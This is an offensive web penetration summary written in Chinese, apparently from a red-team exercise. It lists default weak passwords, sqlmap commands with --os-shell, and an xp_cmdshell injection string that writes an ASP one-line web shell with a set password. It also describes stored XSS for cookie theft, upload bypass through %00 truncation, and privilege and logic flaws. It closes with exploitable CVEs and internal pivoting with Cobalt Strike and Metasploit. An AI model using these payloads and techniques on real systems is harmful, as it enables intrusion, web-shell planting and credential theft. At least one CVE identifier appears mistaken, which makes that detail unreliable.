攻防演练总结1

攻防演练总结1

web渗透

弱口令
傻瓜版本弱口令：admin/123456 admin/admin@123 admin/abcd1234! sysadmin/123456（即使登录口有验证码和登录次数限制爆破，手工尝试也极容易命中
） 稍微好一点的就是账号/密码使用身份证号，邮箱等个人信息组合，攻击者要想爆破此类密码就需要收集目标个人信息制作字典，加大了攻击难度。

Sql注入
利用方法：万能密码登录后台，sql注入爆数据库，sql注入写shell（必须是超级管理员用户）

常用参数：
-u URL, --url=URL   目标 URL
--random-agent     使用 随机选定的HTTP User - Agent 
--level=LEVEL       执行测试的等级 (level达到2才会检测cookie,level越大测试越全面）
--risk=RISK         Risk of tests to perform (1-3, default 1)           执行测试的风险 ，默认是1会测试大部分的测试语句，2会增加基于事件的测试语句，3会增加OR语句的SQL注入测试
--current-user      当前用户
--is-dba            检测DBMS当前用户是否DBA  
--current-db        测试当前数据库
-r REQUESTFILE      多用于post注入
--dbms="Microsoft SQL Server"  指定数据库为“Microsoft SQL Server”
-p TESTPARAMETER    可测试的参数
--os-shell          注入shell，dba权限
--search            Search column(s), table(s) and/or database name(s)   搜索列 （S），表（S）和/或数据库名称（S）
--dbs               所有数据库
--tables            所有数据表
--columns           所有字段
-D                  选定数据库
-T                  选定数据表
-C                  选定数据字段
--batch             从不询问用户输入，使用所有默认配置

放几个使用实例：

Python sqlmap.py -u “url” --random-agent --level=2 --risk=1--current-user --current-db --is-dba --tables
Python sqlmap.py -r "c:\test\request.txt" --random-agent --dbms="Microsoft SQL Server" -p status --os-shell --batch
Python sqlmap.py -r "c:\test\request.txt" --dbms=mysql -D test --search -C admin,password    在test数据库中搜索字段admin或者password。

使用xp_cmdshell手工注入可getshell,向D:\Web\test\shell.asp文件写入asp一句话，密码为itisme

admin';exec master.dbo.xp_cmdshell 'echo ^<%eval request ("itisme") %^> >>D:\\Web\\test\\shell.asp'

xss：（相对于反射型，存储型xss更有利用价值）调用远程js，实现用户cookie窃取，网站劫持。网页篡改，钓鱼。以前做的反射型xss事件的发现，扩展和利用，如果对xss不熟悉的朋友可以看一下
越权
垂直越权，横向越权（一般能垂直越权就能横向越权，操作没差）
垂直越权：
案例1.任意账户密码修改，密码修改处提交数据抓包更改目标id为管理员用户id，修改管理员密码实现垂直越权。
案例2. 没有限制普通管理员的操作权限，普通管理员用户拥有创建超级管理员用户的权限实现垂直提权。
案例3.信息查询处普通用户抓包修改请求的用户识别参数为管理员或者其他高权限用户，提交返回目标用户信息，这个适用于信息窃取。
暂且遇到这一些可越权的情况。
逻辑漏洞
案例1.网页忘记密码或者修改密码处传输原密码的加密值回本地（密码窃取）
案例2.商品购买前端提交商品价格（0元买商品）
案例3.登录口验证码不刷新可重复使用（爆破攻击和重放攻击）
案例4.注册等发送短信的地方，验证码申请没有时间间隔（拒绝服务攻击）
任意文件上传
漏洞点：上传绕过，cms漏洞，编辑器KindEditor文件上传漏洞
如果限制了文件上传类型，考虑：
文件截断绕过上传判断：ha.asp%00.jpg 抓包对%00实现url编码
上传白名单类型文件配合服务器文件错误解析，文件包含漏洞等一系列绕过办法。
（成果利用可网站挂黑页，getshell）
url重定向
考虑网络钓鱼，用@突破部分重定向限制
敏感信息泄露
目录遍历，有一些极度敏感的信息没有限制用户访问。Txt，bak，xsl，docx等文件特别注意
系统漏洞，软件漏洞
cve-2019-0708
ms17-010
IIS 6.0 PUT上传 任意文件创建漏洞
Weblogic反序列化命令执行（cve-2018-2393）
structs2远程代码执行（s2-045）（Struct2框架普遍表现文件后缀名为.action，.do或者没有后缀名。看到这种页面就习惯性structs2漏扫一下）
，，，，，
内网漫游：
regeorg+proxifier网络代理建立内网通行通道
冰蝎配合matesploit进行内网渗透
cobalt strike联合matesploit进行提权
系统白名单执行payload绕过防火墙
撞库